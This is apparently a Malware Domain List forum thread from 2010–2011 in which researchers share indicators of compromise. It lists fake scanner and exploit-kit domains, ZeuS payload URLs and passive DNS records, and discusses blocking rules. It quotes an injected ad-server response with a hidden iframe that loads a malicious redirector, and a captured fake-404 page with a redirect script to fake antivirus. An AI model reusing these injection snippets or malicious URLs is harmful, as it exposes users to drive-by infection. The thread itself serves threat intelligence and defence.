Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on June 18, 2010, 04:30:09 pm

Title: Malicious Domains - eoin.miller
Post by: eoin.miller on June 18, 2010, 04:30:09 pm
This thread is for the one off's we find.

Fake Scanner Pages:
www2.routesave19.co.cc
www2.netguard37-pd.co.cc

http://www2.routesave19.co.cc/Images/loading.gif
http://www2.routesave19.co.cc/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 21, 2010, 04:24:58 pm
FakeAV infected clients POST'ing to:

wellsellit.com

http://wellsellit.com/borders.php
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 22, 2010, 09:01:19 pm
Exploited clients posting to:

lolopingtroll.org/stats/gate.php?id=84fefcb9

and pulling from:

pulselocums.com.au/media/sound.exe

VirusTotal says its ZeuS:
http://www.virustotal.com/analisis/191d6ac238d6684a385380826bcf34f2698632c2ca9fbc57f4143b0310ea5cc0-1277240374
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 22, 2010, 09:10:09 pm
Fake Scanners:

www1.softscaner35.co.cc
www1.softscaner36.co.cc
www2.newbless6.co.cc
www1.softscaner34.co.cc

All have the following URL accessible:
/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 25, 2010, 04:47:09 pm
More fake scanner pages:

http://www1.trytocleanit-45p.co.cc
http://www1.avsolution31pr.co.cc
http://www2.lordofsave9.co.cc
http://www2.lordofsave4.co.cc
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on June 28, 2010, 05:08:03 pm
Fake Scanners:

www1.glory4.co.cc
www1.glory3.co.cc
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 06, 2010, 06:50:01 pm
Fake Scanner Pages:
www1.oksave9.co.cc

Redirectors to Fake Scanner Pages:
www3.avsolution42.co.cc
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 06, 2010, 08:36:49 pm
FakeAV page:

http://antivirglass.com/purchase?pgid=2&r=57.5
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 09, 2010, 05:13:17 pm
FakeAV:
http://business.one.strangled.net/3/?c=917

Redirects to FakeAV:
http://pivfeels.com/mytds/go.php?s=17
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 09, 2010, 05:27:29 pm
Phoenix Exploit kit:

http://decorum76.info/e9t/

More domains on same IP with exploit kits:

decoy56.info/e9t/
extraditelbds.info/e9t/
erratic335.info/e9t/
magnatevhl8.info/q8s/
bristlejfgj8.info/e9t/
inclination19y.info/x0c/
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 13, 2010, 05:15:25 pm
Drive by's with very low detection rates (1/41):

http://domger.in/d/

VirusTotal Payload Results:
http://www.virustotal.com/analisis/1f75ef5ae8b8c0a8cc13242cd22a75c0e45f443b9a6fe8906287b9c1e6bbb3bb-1279005248
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 15, 2010, 04:58:06 pm
Phoenix drive by kits:

http://whetcb67.info/n21/ - drive by
http://fglq.info/n2l/l.php?i=3 - payload
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on July 20, 2010, 10:11:44 pm
http://333.gorgrengos.com/b/index.php - driveby
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 01, 2010, 08:03:57 pm
Drive by:

www.hezhexh.co.cc/x33/

Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of hacked forum link that leads to this drive by:

http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25
Title: Re: Malicious Domains - eoin.miller
Post by: SysAdMini on September 01, 2010, 08:34:35 pm
Drive by:

www.hezhexh.co.cc/x33/

Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of hacked forum link that leads to this drive by:

http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25

The Openx adserver has been compromised.

http://www.bicycles.net.au/adserver/www/delivery/spc.php?zones=1|2|3
Code: [Select]
var OA_output = new Array();
OA_output['1'] = '';

OA_output['2'] = '';

OA_output['3'] = '';
OA_output['3'] += "<"+"a href=\'http://www.bicycles.net.au/adserver/www/delivery/ck.php?oaparams=2__bannerid=20__zoneid=3__cb=82c8d8ab02__oadest=http%3A%2F%2Fwww.cyclechallenge.com%2FThe-Event-1%2FInternational-Riders%2FWin-a-trip-to-Cycle-Challenge%2Fdefault.aspx\' target=\'_blank\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/images/b9e4c50eff89401296bf4b6e66125934.gif\' width=\'120\' height=\'80\' alt=\'Competition: Contact Lake Taupo Cycle Challenge\' title=\'Competition: Contact Lake Taupo Cycle Challenge\' border=\'0\' /><"+"/a><"+"div id=\'beacon_82c8d8ab02\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/delivery/lg.php?bannerid=20&amp;campaignid=8&amp;zoneid=3&amp;cb=82c8d8ab02\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe src=\"http://rpzrtru.co.cc/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>\n";
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 03, 2010, 05:26:26 pm
borat-carrer.com/img/index.php - Phoenix Exploit Kit
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 03, 2010, 09:30:34 pm
trade-yourauto.info/s/index.php - Phoenix Exploit Kit
trade-yourauto.info/s/tmp/des.jar - Java Exploit
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 07, 2010, 05:59:51 pm
jazzstibbtm.com/aa/index.php - phoenix exploit kit
79.135.152.222/a/index.php - phoenix exploit kit
brittnom.com/038512946/news.php - phoenix exploit kit

http://193.169.235.225/?q=Z5249FKA1J61R99H14NWY1W0J6VOWW67ZECX0K1Y8N4DO010Y52DNG9D847NNN4TV4VL0Y9V79UU09XWZW8D9ZE50K0XEJISRkiJU06WW47XUUpVmsnMyVaMkk2Qj8iMitKBmlybWoCfB9uCGANdzMBTQElAU50d3BfdlkMACh%252BegVkbw1veFZgW28CXWFmVl09Nj9nATgIaH0GCH0GAQcGTSM4NQ%253D%253D - Fake Scanner Page

http://193.169.235.225/?q=asdf - payload (can be anything after the q= really)
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 07, 2010, 08:00:28 pm
http://h26heh1.co.cc/x6dmrk2/  - drive by

jsunpack results:
http://jsunpack.jeek.org/dec/go?report=8f812b03d3390d1476b1c4f112e62cd4c8496ae2
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on September 07, 2010, 08:34:44 pm
http://stepanola.in:8080/axb/ - drive by (eleonore IIRC)
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on December 06, 2010, 04:16:34 pm
Phoenix Exploit Kit:
68.68.20.113 - fun.anexelymoweq.in

Redirector (second stage):
78.46.75.144 - verystrangeone.com/in.cgi?13

Redirector (first stage):
174.137.146.174 - 174.137.146.174/?cbb=27867330230596





Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 07, 2011, 11:32:15 pm
Seeing this one being redirected to by hacked Drupal websites:

Phoenix Exploit Kit:
62.122.73.51 - http://besimorr.com/images/start.php?id=vlnd

Other hostnames via passive DNS:

Code: [Select]
cubbypa.com  A  62.122.73.51
ns1.cubbypa.com  A  62.122.73.51
ns2.cubbypa.com  A  62.122.73.51
chinapinkpig.com  A  62.122.73.51
ns1.chinapinkpig.com  A  62.122.73.51
ns2.chinapinkpig.com  A  62.122.73.51
boxberil.com  A  62.122.73.51
ns1.boxberil.com  A  62.122.73.51
ns2.boxberil.com  A  62.122.73.51
disreco.com  A  62.122.73.51
ns1.disreco.com  A  62.122.73.51
ns2.disreco.com  A  62.122.73.51
besimorr.com  A  62.122.73.51
ns1.besimorr.com  A  62.122.73.51
ns2.besimorr.com  A  62.122.73.51
delilit.com  A  62.122.73.51
ns1.delilit.com  A  62.122.73.51
ns2.delilit.com  A  62.122.73.51
ns1.youtubesxx.com  A  62.122.73.51
ns2.youtubesxx.com  A  62.122.73.51

62.122.73.52 seems to be bound to the same host as well:

Code: [Select]
boxberil.com  A  62.122.73.52
shoughbo.com  A  62.122.73.52
ns1.shoughbo.com  A  62.122.73.52
ns2.shoughbo.com  A  62.122.73.52
delilit.com  A  62.122.73.52
youtubesxx.com  A  62.122.73.52

heh:
/home/shayai/public_html/index.php

I <3 php error reporting
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 12, 2011, 08:46:11 am
Another phoenix kit having traffic driven to it from exploited domains:

http://boxberil.com/images/start.php?id=vlnd
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 12, 2011, 07:34:44 pm
More phoenix:

91.193.192.90 - http://7tokk.cz.cc/vo/ithsaoj.php

Uses SEO poisoning to drive users to it.
Title: Re: Malicious Domains - eoin.miller
Post by: Seedler on January 12, 2011, 09:25:16 pm
A while back I configured DNS to not resolve any co.cc or cz.cc domains at all.  I have not had any business impact after doing this and this and this is for a Fortune 500 company.  I recommend you do the same.

-Seedler
Title: Re: Malicious Domains - eoin.miller
Post by: SysAdMini on January 12, 2011, 11:27:23 pm
A while back I configured DNS to not resolve any co.cc or cz.cc domains at all.  I have not had any business impact after doing this and this and this is for a Fortune 500 company.  I recommend you do the same.

-Seedler

I blocked co.cc and cz.cc domains on proxy servers of a large company and haven't had any business impact. I can recommend that too.
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 14, 2011, 10:40:19 pm
A while back I configured DNS to not resolve any co.cc or cz.cc domains at all.  I have not had any business impact after doing this and this and this is for a Fortune 500 company.  I recommend you do the same.

-Seedler

I blocked co.cc and cz.cc domains on proxy servers of a large company and haven't had any business impact. I can recommend that too.

We do that as well for an 80k+ user network. I also wrote the Snort sigs that look for these domains in HTTP requests and alert on them as suspicious through the EmergingThreats snort users group ;)
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on January 14, 2011, 10:41:46 pm
More Phoenix:
thruleni.com/images/start.php?id=wag5 - 62.122.73.53

IP is already in theMDL with another hostname but is listed as "fake av".


Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on February 02, 2011, 07:03:36 pm
Phoenix Kits:

advancedwebanalytic.com/stats/fnktcnfza3.php
zlenbigret.com/03oofm059mw.php?s=IBCCL

Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on February 14, 2011, 07:57:40 pm
More phoenix:

web-statistics-css.ru/n3/xndobob.php

anyone going to bible.com is getting redirected to this currently.
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on March 21, 2011, 06:43:19 pm
More Phoenix:

www.zanupoits.com
http://www.zanupoits.com/722quoct6k.php?s=IBCCM

Looks to be fluxing.
Title: Re: Malicious Domains - eoin.miller
Post by: eoin.miller on March 24, 2011, 10:48:30 pm
174.127.87.104 - various host names


This is redirectiong to lots of fake scanner pages like freeantiagencyxp.com. Definately needs to be listed. Doing some more intel on this now....

Code: [Select]
GET /?s=18 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-e
xcel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-
flash, */*
Referer: http://getmediacontent.com/145/40brands/banner.html
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET C
LR 2.0.50727)
Host: 30kuil1.iodelivery.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 13:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 861
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=uft8">
  <title>404 Not Found</title>
  <script>
if (window.top != window.parent.parent) window.top.location.href="http://xpscanan
tiviruscentral.com/index2.php?06abQDU9QUDBV2v7rCw7i8WveTo6MHVmLVpZeCOrV1lTN5AlQy2
K";
</script>
  </head>
  <body>
<h1>Not Found</h1>
<p>The requested URL /index.html was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
</p>
<hr>
<address>Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p
assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Port 80</address>
  </body>
</html>